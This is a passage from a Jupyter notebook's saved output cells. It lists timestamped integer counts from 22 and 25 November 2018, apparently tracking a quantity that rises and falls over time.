"['2018-11-22 16:01:14.237498', 14]\n",
"['2018-11-22 16:01:16.394529', 15]\n",
"['2018-11-22 16:01:18.303878', 16]\n",
"['2018-11-22 16:01:19.979901', 17]\n",
"['2018-11-22 16:01:20.946274', 18]\n",
"['2018-11-22 16:01:21.842713', 19]\n",
"['2018-11-22 16:01:28.685923', 20]\n",
"['2018-11-22 16:01:31.474090', 21]\n",
"['2018-11-22 16:01:41.078454', 22]\n",
"['2018-11-22 16:02:00.602791', 23]\n",
"['2018-11-22 16:02:02.964321', 24]\n",
"['2018-11-22 16:02:04.790091', 25]\n",
"['2018-11-22 16:02:36.932852', 26]\n",
"['2018-11-22 16:03:02.245320', 27]\n",
"['2018-11-22 16:03:04.595207', 28]\n",
"['2018-11-22 16:03:11.692198', 29]\n",
"['2018-11-22 16:03:43.117056', 30]\n",
"['2018-11-22 16:03:50.010911', 29]\n",
"['2018-11-22 16:04:18.846049', 28]\n",
"['2018-11-22 16:04:29.049815', 26]\n",
"['2018-11-22 16:04:47.458475', 25]\n",
"['2018-11-22 16:04:57.284946', 24]\n",
"['2018-11-22 16:05:50.946176', 21]\n",
"['2018-11-22 16:06:09.656275', 19]\n",
"['2018-11-22 16:06:25.537677', 20]\n",
"['2018-11-22 16:06:31.824478', 21]\n",
"['2018-11-22 16:07:08.078751', 19]\n",
"['2018-11-22 16:07:11.731386', 18]\n",
"['2018-11-22 16:07:18.843759', 17]\n",
"['2018-11-22 16:07:51.647732', 15]\n",
"['2018-11-22 16:08:05.942792', 13]\n",
"['2018-11-22 16:08:21.670647', 11]\n",
"['2018-11-22 16:09:06.376789', 12]\n",
"['2018-11-22 16:09:15.486500', 13]\n",
"['2018-11-22 16:10:00.830411', 14]\n",
"['2018-11-22 16:10:10.719400', 15]\n",
"['2018-11-22 16:10:31.614015', 16]\n",
"['2018-11-22 16:10:52.531398', 17]\n",
"['2018-11-22 16:11:25.851947', 16]\n",
"['2018-11-22 16:11:37.049594', 17]\n",
"['2018-11-22 16:11:49.819091', 18]\n",
"['2018-11-22 16:12:12.582355', 19]\n",
"['2018-11-22 16:12:15.216615', 20]\n",
"['2018-11-22 16:12:47.106126', 19]\n",
"['2018-11-22 16:13:27.698946', 16]\n",
"['2018-11-22 16:13:58.587273', 15]\n",
"['2018-11-22 16:14:14.327286', 16]\n",
"['2018-11-22 16:14:32.663300', 13]\n",
"['2018-11-22 16:14:35.077774', 14]\n",
"['2018-11-22 16:14:54.683141', 13]\n",
"['2018-11-22 16:16:01.908746', 11]\n",
"['2018-11-22 16:16:32.112248', 9]\n",
"['2018-11-22 16:17:23.452540', 10]\n",
"['2018-11-22 16:17:32.625752', 9]\n",
"['2018-11-22 16:17:54.812486', 8]\n",
"['2018-11-22 16:18:23.468276', 7]\n",
"['2018-11-22 16:18:29.624102', 8]\n",
"['2018-11-22 16:19:34.998383', 6]\n",
"['2018-11-22 16:22:19.552623', 7]\n",
"['2018-11-22 16:22:37.760501', 6]\n",
"['2018-11-22 16:36:41.236759', 3]\n",
"['2018-11-22 16:37:08.031721', 4]\n",
"['2018-11-22 16:38:23.547099', 5]\n",
"['2018-11-22 16:38:31.039205', 6]\n",
"['2018-11-22 16:38:54.370061', 7]\n",
"['2018-11-22 16:40:00.521381', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 16:41:00.051649', 9]\n",
"['2018-11-22 16:41:43.060106', 10]\n",
"['2018-11-22 16:42:35.422358', 8]\n",
"['2018-11-22 16:44:36.868090', 7]\n",
"['2018-11-22 16:45:06.112611', 8]\n",
"['2018-11-22 16:46:25.510863', 6]\n",
"['2018-11-22 16:46:38.252916', 5]\n",
"['2018-11-22 16:47:03.585796', 6]\n",
"['2018-11-22 16:47:08.011439', 7]\n",
"['2018-11-22 16:47:52.626490', 8]\n",
"['2018-11-22 16:48:29.490194', 9]\n",
"['2018-11-22 16:48:41.491527', 10]\n",
"['2018-11-22 16:48:57.876020', 11]\n",
"['2018-11-22 16:49:15.255092', 10]\n",
"['2018-11-22 16:49:33.079153', 11]\n",
"['2018-11-22 16:49:45.056706', 12]\n",
"['2018-11-22 16:50:11.888504', 13]\n",
"['2018-11-22 16:52:57.515077', 12]\n",
"['2018-11-22 16:53:00.426848', 13]\n",
"['2018-11-22 16:53:04.389281', 14]\n",
"['2018-11-22 16:53:10.310995', 15]\n",
"['2018-11-22 16:53:16.025537', 16]\n",
"['2018-11-22 16:53:20.049538', 17]\n",
"['2018-11-22 16:53:21.738735', 18]\n",
"['2018-11-22 16:53:30.831204', 19]\n",
"['2018-11-22 16:53:40.036268', 18]\n",
"['2018-11-22 16:53:53.979439', 17]\n",
"['2018-11-22 16:53:55.096266', 18]\n",
"['2018-11-22 16:53:55.116928', 19]\n",
"['2018-11-22 16:53:59.675629', 18]\n",
"['2018-11-22 16:54:04.535440', 19]\n",
"['2018-11-22 16:54:07.656246', 20]\n",
"['2018-11-22 16:54:09.711367', 21]\n",
"['2018-11-22 16:54:09.847347', 22]\n",
"['2018-11-22 16:54:12.905864', 21]\n",
"['2018-11-22 16:54:26.352047', 22]\n",
"['2018-11-22 16:54:27.591741', 23]\n",
"['2018-11-22 16:54:42.913630', 24]\n",
"['2018-11-22 16:55:18.816152', 25]\n",
"['2018-11-22 16:56:00.039667', 24]\n",
"['2018-11-22 16:56:02.167353', 25]\n",
"['2018-11-22 16:56:08.810322', 26]\n",
"['2018-11-22 16:56:10.528383', 27]\n",
"['2018-11-22 16:56:13.665869', 28]\n",
"['2018-11-22 16:56:40.040557', 27]\n",
"['2018-11-22 16:56:55.189909', 28]\n",
"['2018-11-22 16:56:56.910898', 29]\n",
"['2018-11-22 16:56:58.431813', 30]\n",
"['2018-11-22 16:57:00.040470', 29]\n",
"['2018-11-22 16:57:03.838315', 30]\n",
"['2018-11-22 16:57:07.036077', 31]\n",
"['2018-11-22 16:57:10.668699', 30]\n",
"['2018-11-22 16:57:20.050344', 29]\n",
"['2018-11-22 16:57:25.106912', 28]\n",
"['2018-11-22 16:57:42.957609', 29]\n",
"['2018-11-22 16:57:57.736949', 27]\n",
"['2018-11-22 16:58:05.743469', 26]\n",
"['2018-11-22 16:58:10.042329', 25]\n",
"['2018-11-22 16:58:14.730868', 26]\n",
"['2018-11-22 16:58:30.536233', 27]\n",
"['2018-11-22 16:58:46.738502', 28]\n",
"['2018-11-22 16:58:59.348630', 29]\n",
"['2018-11-22 16:59:05.447633', 30]\n",
"['2018-11-22 16:59:20.045125', 28]\n",
"['2018-11-22 16:59:26.167802', 29]\n",
"['2018-11-22 17:00:39.467924', 27]\n",
"['2018-11-22 17:06:36.647467', 3]\n",
"['2018-11-22 17:06:44.842326', 4]\n",
"['2018-11-22 17:07:12.897109', 5]\n",
"['2018-11-22 17:11:13.319275', 4]\n",
"['2018-11-22 17:12:22.197228', 5]\n",
"['2018-11-22 17:13:12.635937', 6]\n",
"['2018-11-22 17:13:29.640514', 5]\n",
"['2018-11-22 17:18:23.482474', 6]\n",
"['2018-11-22 17:18:43.187693', 7]\n",
"['2018-11-22 17:24:22.185431', 3]\n",
"['2018-11-22 17:31:07.060387', 4]\n",
"['2018-11-22 17:33:33.147979', 5]\n",
"['2018-11-22 17:40:22.215720', 4]\n",
"['2018-11-22 17:41:58.315443', 5]\n",
"['2018-11-22 17:45:35.824463', 4]\n",
"['2018-11-22 17:45:48.927411', 5]\n",
"['2018-11-22 17:46:13.766904', 4]\n",
"['2018-11-22 17:47:32.662171', 5]\n",
"['2018-11-22 17:48:22.241915', 6]\n",
"['2018-11-22 17:49:14.564064', 7]\n",
"['2018-11-22 17:52:18.672169', 8]\n",
"['2018-11-22 17:53:58.112438', 7]\n",
"['2018-11-22 17:56:19.412881', 6]\n",
"['2018-11-22 17:58:01.804701', 5]\n",
"['2018-11-22 18:00:22.256091', 4]\n",
"['2018-11-22 18:02:12.406139', 5]\n",
"['2018-11-22 18:02:26.854734', 6]\n",
"['2018-11-22 18:07:35.165435', 4]\n",
"['2018-11-22 18:09:41.361021', 5]\n",
"['2018-11-22 18:12:19.118356', 4]\n",
"['2018-11-22 18:16:16.897592', 5]\n",
"['2018-11-22 18:17:54.382755', 6]\n",
"['2018-11-22 18:24:27.687483', 5]\n",
"['2018-11-22 18:25:47.684892', 3]\n",
"['2018-11-22 18:40:40.272563', 4]\n",
"['2018-11-22 18:41:18.150833', 5]\n",
"['2018-11-22 18:41:27.331073', 6]\n",
"['2018-11-22 18:42:21.504044', 7]\n",
"['2018-11-22 18:44:26.737852', 6]\n",
"['2018-11-22 18:48:32.751578', 5]\n",
"['2018-11-22 18:48:55.386055', 6]\n",
"['2018-11-22 18:48:55.463792', 7]\n",
"['2018-11-22 18:49:14.401234', 8]\n",
"['2018-11-22 18:49:15.913392', 9]\n",
"['2018-11-22 18:49:19.487164', 10]\n",
"['2018-11-22 18:49:20.211390', 11]\n",
"['2018-11-22 18:49:25.865427', 12]\n",
"['2018-11-22 18:49:34.862532', 11]\n",
"['2018-11-22 18:49:35.504174', 10]\n",
"['2018-11-22 18:49:36.441530', 11]\n",
"['2018-11-22 18:49:36.683596', 12]\n",
"['2018-11-22 18:50:15.821265', 13]\n",
"['2018-11-22 18:52:03.738017', 14]\n",
"['2018-11-22 18:52:38.005461', 13]\n",
"['2018-11-22 18:52:42.290847', 14]\n",
"['2018-11-22 18:52:42.369701', 15]\n",
"['2018-11-22 18:52:47.953851', 16]\n",
"['2018-11-22 18:52:53.531775', 17]\n",
"['2018-11-22 18:52:55.697318', 16]\n",
"['2018-11-22 18:53:10.468594', 17]\n",
"['2018-11-22 18:53:28.323526', 18]\n",
"['2018-11-22 18:53:28.333165', 19]\n",
"['2018-11-22 18:53:32.095827', 18]\n",
"['2018-11-22 18:53:37.204976', 19]\n",
"['2018-11-22 18:53:38.799721', 20]\n",
"['2018-11-22 18:53:43.248488', 21]\n",
"['2018-11-22 18:53:49.908978', 22]\n",
"['2018-11-22 18:53:53.463102', 23]\n",
"['2018-11-22 18:54:02.270191', 24]\n",
"['2018-11-22 18:54:14.082680', 25]\n",
"['2018-11-22 18:54:17.831114', 24]\n",
"['2018-11-22 18:54:23.648289', 25]\n",
"['2018-11-22 18:54:31.188981', 26]\n",
"['2018-11-22 18:54:35.388608', 27]\n",
"['2018-11-22 18:55:09.262584', 28]\n",
"['2018-11-22 18:55:48.473786', 29]\n",
"['2018-11-22 18:55:59.391602', 30]\n",
"['2018-11-22 18:56:05.180895', 29]\n",
"['2018-11-22 18:56:05.583388', 30]\n",
"['2018-11-22 18:56:08.693023', 31]\n",
"['2018-11-22 18:56:10.653305', 32]\n",
"['2018-11-22 18:56:12.684727', 33]\n",
"['2018-11-22 18:56:22.571450', 34]\n",
"['2018-11-22 18:56:44.175298', 33]\n",
"['2018-11-22 18:57:01.953557', 34]\n",
"['2018-11-22 18:57:30.154696', 33]\n",
"['2018-11-22 18:57:37.727727', 32]\n",
"['2018-11-22 18:58:06.461897', 31]\n",
"['2018-11-22 18:58:10.221963', 32]\n",
"['2018-11-22 18:58:15.298980', 30]\n",
"['2018-11-22 18:58:30.676111', 31]\n",
"['2018-11-22 18:58:34.278375', 32]\n",
"['2018-11-22 18:58:34.795304', 33]\n",
"['2018-11-22 18:58:48.315728', 34]\n",
"['2018-11-22 18:59:10.434305', 33]\n",
"['2018-11-22 18:59:22.531493', 34]\n",
"['2018-11-22 18:59:30.980404', 35]\n",
"['2018-11-22 18:59:32.836023', 34]\n",
"['2018-11-22 19:00:09.371144', 35]\n",
"['2018-11-22 19:00:11.232034', 34]\n",
"['2018-11-22 19:01:07.966649', 33]\n",
"['2018-11-22 19:01:17.979178', 32]\n",
"['2018-11-22 19:01:20.608667', 31]\n",
"['2018-11-22 19:01:35.047211', 32]\n",
"['2018-11-22 19:01:56.069328', 31]\n",
"['2018-11-22 19:02:36.780043', 29]\n",
"['2018-11-22 19:03:05.424976', 27]\n",
"['2018-11-22 19:03:12.513834', 28]\n",
"['2018-11-22 19:03:57.971224', 25]\n",
"['2018-11-22 19:04:11.153477', 21]\n",
"['2018-11-22 19:04:11.940646', 22]\n",
"['2018-11-22 19:04:25.926430', 19]\n",
"['2018-11-22 19:04:30.697051', 20]\n",
"['2018-11-22 19:04:45.879638', 19]\n",
"['2018-11-22 19:04:59.208260', 18]\n",
"['2018-11-22 19:05:25.429093', 17]\n",
"['2018-11-22 19:05:40.663136', 18]\n",
"['2018-11-22 19:06:18.078853', 19]\n",
"['2018-11-22 19:06:26.347934', 17]\n",
"['2018-11-22 19:06:46.894851', 16]\n",
"['2018-11-22 19:07:59.424426', 15]\n",
"['2018-11-22 19:08:36.883426', 13]\n",
"['2018-11-22 19:09:16.081967', 14]\n",
"['2018-11-22 19:09:29.687005', 13]\n",
"['2018-11-22 19:09:49.775786', 12]\n",
"['2018-11-22 19:09:59.598246', 13]\n",
"['2018-11-22 19:10:48.848508', 12]\n",
"['2018-11-22 19:11:02.769098', 13]\n",
"['2018-11-22 19:15:05.025554', 3]\n",
"['2018-11-22 19:28:22.858110', 4]\n",
"['2018-11-22 19:38:54.796920', 3]\n",
"['2018-11-22 19:40:55.897333', 4]\n",
"['2018-11-22 19:44:44.790284', 5]\n",
"['2018-11-22 19:45:17.045380', 6]\n",
"['2018-11-22 19:46:06.457333', 7]\n",
"['2018-11-22 19:46:39.587551', 8]\n",
"['2018-11-22 19:48:36.058986', 9]\n",
"['2018-11-22 19:48:36.516199', 10]\n",
"['2018-11-22 19:48:36.920266', 11]\n",
"['2018-11-22 19:48:41.054534', 12]\n",
"['2018-11-22 19:48:42.682897', 13]\n",
"['2018-11-22 19:48:45.507169', 12]\n",
"['2018-11-22 19:48:47.763504', 13]\n",
"['2018-11-22 19:49:00.530738', 14]\n",
"['2018-11-22 19:49:02.973164', 15]\n",
"['2018-11-22 19:49:03.053554', 14]\n",
"['2018-11-22 19:49:05.460732', 15]\n",
"['2018-11-22 19:49:09.999799', 16]\n",
"['2018-11-22 19:49:20.090846', 15]\n",
"['2018-11-22 19:49:21.801005', 16]\n",
"['2018-11-22 19:49:28.172849', 17]\n",
"['2018-11-22 19:49:36.188932', 16]\n",
"['2018-11-22 19:49:42.111728', 17]\n",
"['2018-11-22 19:49:58.534335', 18]\n",
"['2018-11-22 19:50:40.972586', 19]\n",
"['2018-11-22 19:51:14.123631', 20]\n",
"['2018-11-22 19:51:19.604021', 21]\n",
"['2018-11-22 19:51:20.390189', 22]\n",
"['2018-11-22 19:51:48.085488', 23]\n",
"['2018-11-22 19:52:24.039277', 24]\n",
"['2018-11-22 19:52:37.665631', 25]\n",
"['2018-11-22 19:53:10.109352', 26]\n",
"['2018-11-22 19:54:26.397646', 24]\n",
"['2018-11-22 19:54:32.968101', 25]\n",
"['2018-11-22 19:54:45.562277', 26]\n",
"['2018-11-22 19:55:09.585120', 27]\n",
"['2018-11-22 19:55:35.140629', 26]\n",
"['2018-11-22 19:55:56.886587', 25]\n",
"['2018-11-22 19:56:09.728496', 26]\n",
"['2018-11-22 19:56:19.309086', 27]\n",
"['2018-11-22 19:56:28.163457', 28]\n",
"['2018-11-22 19:56:36.865879', 27]\n",
"['2018-11-22 19:56:46.104272', 26]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 19:56:51.215796', 24]\n",
"['2018-11-22 19:56:59.162764', 23]\n",
"['2018-11-22 19:57:00.301000', 22]\n",
"['2018-11-22 19:57:01.016577', 23]\n",
"['2018-11-22 19:57:06.454111', 22]\n",
"['2018-11-22 19:57:09.429884', 23]\n",
"['2018-11-22 19:57:13.329475', 22]\n",
"['2018-11-22 19:57:14.342558', 23]\n",
"['2018-11-22 19:57:22.172129', 24]\n",
"['2018-11-22 19:57:39.200412', 25]\n",
"['2018-11-22 19:58:17.779712', 26]\n",
"['2018-11-22 19:58:27.459621', 25]\n",
"['2018-11-22 19:58:45.070846', 26]\n",
"['2018-11-22 19:59:08.895398', 25]\n",
"['2018-11-22 19:59:10.335758', 24]\n",
"['2018-11-22 19:59:15.978670', 25]\n",
"['2018-11-22 19:59:49.947594', 26]\n",
"['2018-11-22 20:00:12.466214', 25]\n",
"['2018-11-22 20:00:22.570327', 24]\n",
"['2018-11-22 20:00:31.715020', 25]\n",
"['2018-11-22 20:00:43.461396', 24]\n",
"['2018-11-22 20:01:18.018788', 22]\n",
"['2018-11-22 20:01:34.101388', 23]\n",
"['2018-11-22 20:01:39.172885', 24]\n",
"['2018-11-22 20:01:39.573056', 23]\n",
"['2018-11-22 20:01:58.219783', 22]\n",
"['2018-11-22 20:02:16.445072', 20]\n",
"['2018-11-22 20:02:31.728361', 21]\n",
"['2018-11-22 20:02:45.369133', 20]\n",
"['2018-11-22 20:02:50.065273', 21]\n",
"['2018-11-22 20:03:04.326467', 22]\n",
"['2018-11-22 20:03:58.410818', 20]\n",
"['2018-11-22 20:04:01.201152', 21]\n",
"['2018-11-22 20:04:11.525520', 22]\n",
"['2018-11-22 20:04:38.779799', 21]\n",
"['2018-11-22 20:04:46.906734', 20]\n",
"['2018-11-22 20:04:50.261977', 19]\n",
"['2018-11-22 20:05:06.650034', 20]\n",
"['2018-11-22 20:05:35.701732', 19]\n",
"['2018-11-22 20:05:39.952315', 18]\n",
"['2018-11-22 20:05:49.836710', 19]\n",
"['2018-11-22 20:06:54.285461', 18]\n",
"['2018-11-22 20:07:08.346863', 17]\n",
"['2018-11-22 20:07:08.895278', 18]\n",
"['2018-11-22 20:07:12.582148', 17]\n",
"['2018-11-22 20:08:40.820355', 16]\n",
"['2018-11-22 20:09:18.919382', 17]\n",
"['2018-11-22 20:09:49.012394', 16]\n",
"['2018-11-22 20:10:00.470626', 15]\n",
"['2018-11-22 20:10:14.752363', 16]\n",
"['2018-11-22 20:11:14.685026', 15]\n",
"['2018-11-22 20:12:07.093271', 14]\n",
"['2018-11-22 20:12:47.228243', 13]\n",
"['2018-11-22 20:12:47.291405', 14]\n",
"['2018-11-22 20:13:09.806549', 13]\n",
"['2018-11-22 20:13:52.084896', 10]\n",
"['2018-11-22 20:14:00.485801', 9]\n",
"['2018-11-22 20:16:10.148042', 8]\n",
"['2018-11-22 20:18:01.321651', 7]\n",
"['2018-11-22 20:18:28.316117', 6]\n",
"['2018-11-22 20:19:04.794226', 5]\n",
"['2018-11-22 20:34:20.991882', 3]\n",
"['2018-11-22 20:34:28.070425', 4]\n",
"['2018-11-25 05:52:56.169994', 3]\n",
"['2018-11-25 05:53:12.828207', 4]\n",
"['2018-11-25 05:59:53.102268', 5]\n",
"['2018-11-25 06:05:38.163025', 4]\n",
"['2018-11-25 06:07:37.028066', 5]\n",
"['2018-11-25 06:08:30.252850', 4]\n",
"['2018-11-25 06:10:20.638751', 5]\n",
"['2018-11-25 06:12:27.448049', 6]\n",
"['2018-11-25 06:17:19.077905', 4]\n",
"['2018-11-25 06:18:42.503768', 5]\n",
"['2018-11-25 06:24:07.608947', 3]\n",
"['2018-11-25 06:24:57.067453', 4]\n",
"['2018-11-25 06:30:17.286365', 5]\n",
"['2018-11-25 06:37:07.360210', 3]\n",
"['2018-11-25 06:50:52.110515', 4]\n",
"['2018-11-25 06:52:58.419330', 5]\n",
"['2018-11-25 06:53:03.701818', 6]\n",
"['2018-11-25 06:53:03.891143', 7]\n",
"['2018-11-25 06:53:27.829128', 8]\n",
"['2018-11-25 06:54:05.616832', 7]\n",
"['2018-11-25 06:54:57.062910', 6]\n",
"['2018-11-25 06:57:01.735725', 7]\n",
"['2018-11-25 07:05:01.459847', 3]\n",
"['2018-11-25 07:10:43.438029', 4]\n",
"['2018-11-25 07:20:04.618748', 3]\n",
"['2018-11-25 07:22:42.171224', 4]\n",
"['2018-11-25 07:28:20.996861', 3]\n",
"['2018-11-25 07:30:57.924203', 4]\n",
"['2018-11-25 07:31:57.963168', 5]\n",
"['2018-11-25 07:32:13.089040', 6]\n",
"['2018-11-25 07:33:05.820259', 7]\n",
"['2018-11-25 07:36:21.955618', 5]\n",
"['2018-11-25 07:36:34.416258', 6]\n",
"['2018-11-25 07:36:34.820946', 7]\n",
"['2018-11-25 07:36:45.116908', 8]\n",
"['2018-11-25 07:37:44.471306', 9]\n",
"['2018-11-25 07:38:08.511823', 8]\n",
"['2018-11-25 07:38:21.753015', 9]\n",
"['2018-11-25 07:41:10.712080', 8]\n",
"['2018-11-25 07:43:43.705929', 7]\n",
"['2018-11-25 07:44:16.148647', 6]\n",
"['2018-11-25 07:45:22.983959', 7]\n",
"['2018-11-25 07:45:28.459359', 8]\n",
"['2018-11-25 07:45:32.132192', 9]\n",
"['2018-11-25 07:50:21.474390', 3]\n",
"['2018-11-25 07:50:32.083649', 4]\n",
"['2018-11-25 07:51:50.849562', 5]\n",
"['2018-11-25 07:58:02.042714', 3]\n",
"['2018-11-25 08:01:36.023900', 4]\n",
"['2018-11-25 08:03:06.023692', 3]\n",
"['2018-11-25 08:16:08.202895', 4]\n",
"['2018-11-25 08:17:01.039355', 5]\n",
"['2018-11-25 08:17:51.683483', 6]\n",
"['2018-11-25 08:18:08.292270', 7]\n",
"['2018-11-25 08:20:42.391831', 6]\n",
"['2018-11-25 08:20:42.744894', 7]\n",
"['2018-11-25 08:20:53.147019', 8]\n",
"['2018-11-25 08:21:35.065636', 9]\n",
"['2018-11-25 08:22:14.773070', 10]\n",
"['2018-11-25 08:22:45.105405', 11]\n",
"['2018-11-25 08:24:27.781043', 12]\n",
"['2018-11-25 08:24:36.465930', 13]\n",
"['2018-11-25 08:25:25.902030', 14]\n",
"['2018-11-25 08:25:59.017271', 13]\n",
"['2018-11-25 08:26:57.429957', 14]\n",
"['2018-11-25 08:27:05.780901', 15]\n",
"['2018-11-25 08:27:55.604285', 16]\n",
"['2018-11-25 08:28:17.650532', 14]\n",
"['2018-11-25 08:28:21.107291', 15]\n",
"['2018-11-25 08:29:21.076982', 14]\n",
"['2018-11-25 08:29:39.542828', 15]\n",
"['2018-11-25 08:29:47.257054', 14]\n",
"['2018-11-25 08:30:00.429502', 13]\n",
"['2018-11-25 08:30:03.153068', 14]\n",
"['2018-11-25 08:30:22.338763', 15]\n",
"['2018-11-25 08:34:13.733284', 5]\n",
"['2018-11-25 08:35:19.262284', 4]\n",
"['2018-11-25 08:41:17.930718', 3]\n",
"['2018-11-25 08:42:02.353669', 4]\n",
"['2018-11-25 08:46:06.486889', 3]\n",
"['2018-11-25 08:53:16.367115', 4]\n",
"['2018-11-25 08:56:57.748533', 5]\n",
"['2018-11-25 09:01:57.569632', 4]\n",
"['2018-11-25 09:02:02.705042', 5]\n",
"['2018-11-25 09:03:23.599402', 6]\n",
"['2018-11-25 09:04:36.960784', 5]\n",
"['2018-11-25 09:05:13.442190', 6]\n",
"['2018-11-25 09:05:15.228551', 7]\n",
"['2018-11-25 09:05:51.334958', 8]\n",
"['2018-11-25 09:06:07.440839', 9]\n",
"['2018-11-25 09:06:10.013195', 10]\n",
"['2018-11-25 09:06:11.993223', 11]\n",
"['2018-11-25 09:06:19.239697', 12]\n",
"['2018-11-25 09:06:21.423240', 13]\n",
"['2018-11-25 09:06:25.625075', 14]\n",
"['2018-11-25 09:06:37.760067', 15]\n",
"['2018-11-25 09:06:39.129826', 16]\n",
"['2018-11-25 09:06:46.065731', 17]\n",
"['2018-11-25 09:06:55.503272', 18]\n",
"['2018-11-25 09:07:01.844385', 19]\n",
"['2018-11-25 09:07:12.792739', 20]\n",
"['2018-11-25 09:07:17.221943', 21]\n",
"['2018-11-25 09:07:40.066777', 22]\n",
"['2018-11-25 09:07:43.505136', 23]\n",
"['2018-11-25 09:08:09.297708', 24]\n",
"['2018-11-25 09:08:50.610599', 23]\n",
"['2018-11-25 09:09:03.935174', 24]\n",
"['2018-11-25 09:09:08.493309', 25]\n",
"['2018-11-25 09:09:15.747209', 26]\n",
"['2018-11-25 09:09:25.744598', 25]\n",
"['2018-11-25 09:10:15.029034', 26]\n",
"['2018-11-25 09:10:19.113114', 27]\n",
"['2018-11-25 09:10:48.503172', 26]\n",
"['2018-11-25 09:11:09.185044', 27]\n",
"['2018-11-25 09:11:24.762643', 26]\n",
"['2018-11-25 09:11:26.213233', 25]\n",
"['2018-11-25 09:11:26.469404', 26]\n",
"['2018-11-25 09:11:28.971226', 25]\n",
"['2018-11-25 09:11:36.993325', 23]\n",
"['2018-11-25 09:11:41.523532', 22]\n",
"['2018-11-25 09:11:59.777943', 21]\n",
"['2018-11-25 09:12:25.899520', 22]\n",
"['2018-11-25 09:13:00.926969', 23]\n",
"['2018-11-25 09:13:26.679007', 22]\n",
"['2018-11-25 09:13:44.883547', 23]\n",
"['2018-11-25 09:14:03.296231', 24]\n",
"['2018-11-25 09:15:38.274663', 23]\n",
"['2018-11-25 09:15:52.199145', 24]\n",
"['2018-11-25 09:15:54.624915', 25]\n",
"['2018-11-25 09:16:30.470414', 24]\n",
"['2018-11-25 09:16:32.094451', 25]\n",
"['2018-11-25 09:16:36.753969', 24]\n",
"['2018-11-25 09:16:47.520303', 25]\n",
"['2018-11-25 09:16:50.517421', 26]\n",
"['2018-11-25 09:16:51.512343', 27]\n",
"['2018-11-25 09:18:36.863751', 23]\n",
"['2018-11-25 09:18:37.996089', 24]\n",
"['2018-11-25 09:19:09.066413', 22]\n",
"['2018-11-25 09:19:30.166387', 23]\n",
"['2018-11-25 09:19:40.041682', 22]\n",
"['2018-11-25 09:20:18.152679', 19]\n",
"['2018-11-25 09:20:27.540576', 18]\n",
"['2018-11-25 09:20:43.323321', 16]\n",
"['2018-11-25 09:20:55.459156', 10]\n",
"['2018-11-25 09:21:14.568124', 9]\n",
"['2018-11-25 09:21:30.177358', 8]\n",
"['2018-11-25 09:23:34.210076', 7]\n",
"['2018-11-25 09:26:27.432864', 5]\n",
"['2018-11-25 09:27:48.549474', 4]\n",
"['2018-11-25 09:28:38.690171', 5]\n",
"['2018-11-25 09:28:50.863025', 6]\n",
"['2018-11-25 09:38:29.378406', 3]\n",
"['2018-11-25 09:39:13.733310', 4]\n",
"['2018-11-25 09:41:21.549478', 5]\n",
"['2018-11-25 09:41:53.105263', 6]\n",
"['2018-11-25 09:43:09.835489', 5]\n",
"['2018-11-25 09:43:53.939189', 6]\n",
"['2018-11-25 09:44:25.735262', 7]\n",
"['2018-11-25 09:45:29.789801', 8]\n",
"['2018-11-25 09:45:45.364736', 9]\n",
"['2018-11-25 09:47:11.695975', 8]\n",
"['2018-11-25 09:47:44.530548', 9]\n",
"['2018-11-25 09:48:20.394783', 10]\n",
"['2018-11-25 09:48:21.697633', 11]\n",
"['2018-11-25 09:48:31.125971', 9]\n",
"['2018-11-25 09:48:37.548950', 10]\n",
"['2018-11-25 09:49:07.608462', 9]\n",
"['2018-11-25 09:50:02.370944', 10]\n",
"['2018-11-25 09:50:13.643677', 11]\n",
"['2018-11-25 09:51:09.618618', 10]\n",
"['2018-11-25 09:51:30.283379', 11]\n",
"['2018-11-25 09:52:55.540251', 9]\n",
"['2018-11-25 09:52:57.692707', 10]\n",
"['2018-11-25 09:53:11.301871', 11]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 09:53:12.500120', 12]\n",
"['2018-11-25 09:53:12.892753', 13]\n",
"['2018-11-25 09:53:22.930091', 14]\n",
"['2018-11-25 09:53:34.744250', 15]\n",
"['2018-11-25 09:53:40.708957', 16]\n",
"['2018-11-25 09:53:50.146897', 15]\n",
"['2018-11-25 09:54:13.191820', 14]\n",
"['2018-11-25 09:54:32.749405', 15]\n",
"['2018-11-25 09:55:05.913826', 16]\n",
"['2018-11-25 09:55:15.419400', 17]\n",
"['2018-11-25 09:55:34.016155', 16]\n",
"['2018-11-25 09:56:11.447416', 17]\n",
"['2018-11-25 09:56:16.251580', 16]\n",
"['2018-11-25 09:56:16.770545', 17]\n",
"['2018-11-25 09:58:06.917886', 18]\n",
"['2018-11-25 09:58:41.228457', 19]\n",
"['2018-11-25 09:59:06.848988', 18]\n",
"['2018-11-25 09:59:10.908745', 19]\n",
"['2018-11-25 09:59:25.892322', 17]\n",
"['2018-11-25 09:59:37.494475', 16]\n",
"['2018-11-25 09:59:41.230498', 15]\n",
"['2018-11-25 09:59:42.563604', 16]\n",
"['2018-11-25 09:59:52.598487', 15]\n",
"['2018-11-25 10:00:13.543849', 14]\n",
"['2018-11-25 10:00:15.173468', 15]\n",
"['2018-11-25 10:00:20.451827', 16]\n",
"['2018-11-25 10:00:39.877710', 15]\n",
"['2018-11-25 10:02:02.516783', 16]\n",
"['2018-11-25 10:02:10.952631', 17]\n",
"['2018-11-25 10:02:20.841518', 18]\n",
"['2018-11-25 10:04:24.579784', 17]\n",
"['2018-11-25 10:04:47.226688', 18]\n",
"['2018-11-25 10:04:57.870240', 17]\n",
"['2018-11-25 10:05:02.858597', 16]\n",
"['2018-11-25 10:05:16.966522', 15]\n",
"['2018-11-25 10:05:41.591078', 16]\n",
"['2018-11-25 10:05:48.438860', 15]\n",
"['2018-11-25 10:06:19.648923', 13]\n",
"['2018-11-25 10:06:50.915544', 8]\n",
"['2018-11-25 10:07:03.019547', 6]\n",
"['2018-11-25 10:09:42.459742', 4]\n",
"['2018-11-25 10:11:03.980200', 5]\n",
"['2018-11-25 10:11:31.457647', 6]\n",
"['2018-11-25 10:12:02.486029', 5]\n",
"['2018-11-25 10:12:23.602584', 6]\n",
"['2018-11-25 10:12:24.500325', 7]\n",
"['2018-11-25 10:15:47.183393', 5]\n",
"['2018-11-25 10:16:05.120954', 6]\n",
"['2018-11-25 10:17:33.418043', 4]\n",
"['2018-11-25 10:17:43.516092', 5]\n",
"['2018-11-25 10:19:32.956356', 6]\n",
"['2018-11-25 10:20:27.042878', 5]\n",
"['2018-11-25 10:24:36.284911', 6]\n",
"['2018-11-25 10:25:34.869666', 4]\n",
